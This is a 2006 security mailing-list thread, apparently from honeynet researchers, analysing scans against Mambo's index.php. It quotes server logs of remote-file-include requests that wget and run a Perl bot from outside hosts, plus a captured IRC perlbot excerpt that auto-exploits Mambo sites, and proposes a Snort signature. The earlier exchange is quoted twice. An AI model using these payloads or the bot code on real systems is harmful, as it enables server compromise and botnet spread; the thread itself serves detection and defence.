On 15/05/06, Jamie Riden <jamesr (at) europe (dot) com [email concealed]> wrote:
> Looks like some sort of shellbot wanting to connect to an IRC channel
> #abusers on abuser.hacked.in:8080.
>
> I've been seeing occaisonal probes for Mambo's index.php on and off
> for a while now - the first part is similar to
> http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf but the
> payloads are slightly different, though it always seems to end up with
> an IRC bot of some kind.
>
> I usually see them coupled with scans for coppermine and other remote
> include issues, plus xmlrpc probes.
>
> I think you're seeing an attempt to exploit issue#3 here -
> http://secunia.com/advisories/18935/
>
> cheers,
> Jamie
>
> On 14/05/06, Daniel Cid <danielcid (at) yahoo.com (dot) br [email concealed]> wrote:
> > Since Thursday night I'm seeing a high volume of scans
> > on different web servers for possibly the following
> > vulns:
> >
> > http://secunia.com/advisories/14337/
> > http://www.osvdb.org/displayvuln.php?osvdb_id=10180
> >
> >
> > However, they say the problem is on function.php and
> > I'm seeing them on index.php. Can anyone confirm that?
> >
> > Some log samples:
> >
> > 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wge
t%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xenton
ix?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20ht
tp://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20ht
tp://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wge
t%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xenton
ix?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20ht
tp://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20ht
tp://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;w
get%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%
20session.*?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
>
> --
> Jamie Riden / jamesr (at) europe (dot) com [email concealed] / jamie.riden (at) computer (dot) org [email concealed]
> NZ Honeynet project - http://www.nz-honeynet.org/
>
vulnerability - haven't seen this before:
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {^M
sendraw($IRC_cur_socket, "PRIVMSG $printl
:\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1."
seconds.");^M
srand;^M
my $itime = time;^M
my ($cur_time);^M
my ($exploited);^M
$boturl=$2;^M
$cur_time = time - $itime;$exploited = 0;^M
while($1>$cur_time){^M
$cur_time = time - $itime;^M
@urls=fetch();^M
foreach $url (@urls) {^M
sendraw($IRC_cur_socket, "PRIVMSG $printl
:\002[GOOGLE]\002 Trying to exploit ".$url);^M
$cur_time = time - $itime;^M
my $path = "";my $file = "";($path, $file) =
$url =~ /^(.+)\/(.+)$/;^M
$url
=$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBA
LS=&mosConfig_absolute_path=$boturl?";^M
$page = http_query($url);^M
$exploited = $exploited + 1;^M
}^M
}^M
sendraw($IRC_cur_socket, "PRIVMSG $printl
:\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1."
seconds.");^M
This is a quick stab at a snort sig:
alert tcp $EXTERNAL_NET !21:443 -> $HOME_NET !80 (msg: "BLEEDING-EDGE
perlb0t Bot Reporting Scan/Exploit"; flow: to_server,established;
content:"PRIVMSG|20|"; nocase; within: 80; tag: session, 20, packets;
pcre:"/(GOOGLE|HTTP|TCP|SCAN|UDP|VERSION)/i"; within:16;
pcre:"/(Exploiting|Exploited}Attacking|Scanning|perlb0t)/i";
classtype: trojan-activity; sid: xxxx; rev:1; )
but I'm sure this could be improved.
cheers,
Jamie
On 15/05/06, Jamie Riden <jamesr (at) europe (dot) com [email concealed]> wrote:
> Looks like some sort of shellbot wanting to connect to an IRC channel
> #abusers on abuser.hacked.in:8080.
>
> I've been seeing occaisonal probes for Mambo's index.php on and off
> for a while now - the first part is similar to
> http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf but the
> payloads are slightly different, though it always seems to end up with
> an IRC bot of some kind.
>
> I usually see them coupled with scans for coppermine and other remote
> include issues, plus xmlrpc probes.
>
> I think you're seeing an attempt to exploit issue#3 here -
> http://secunia.com/advisories/18935/
>
> cheers,
> Jamie
>
> On 14/05/06, Daniel Cid <danielcid (at) yahoo.com (dot) br [email concealed]> wrote:
> > Since Thursday night I'm seeing a high volume of scans
> > on different web servers for possibly the following
> > vulns:
> >
> > http://secunia.com/advisories/14337/
> > http://www.osvdb.org/displayvuln.php?osvdb_id=10180
> >
> >
> > However, they say the problem is on function.php and
> > I'm seeing them on index.php. Can anyone confirm that?
> >
> > Some log samples:
> >
> > 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wge
t%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xenton
ix?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20ht
tp://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20ht
tp://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wge
t%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xenton
ix?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20ht
tp://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20ht
tp://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;w
get%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%
20session.*?
> > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
>
> --
> Jamie Riden / jamesr (at) europe (dot) com [email concealed] / jamie.riden (at) computer (dot) org [email concealed]
> NZ Honeynet project - http://www.nz-honeynet.org/
>
--
Jamie Riden / jamesr (at) europe (dot) com [email concealed] / jamie.riden (at) computer (dot) org [email concealed]
NZ Honeynet project - http://www.nz-honeynet.org/
[ reply ]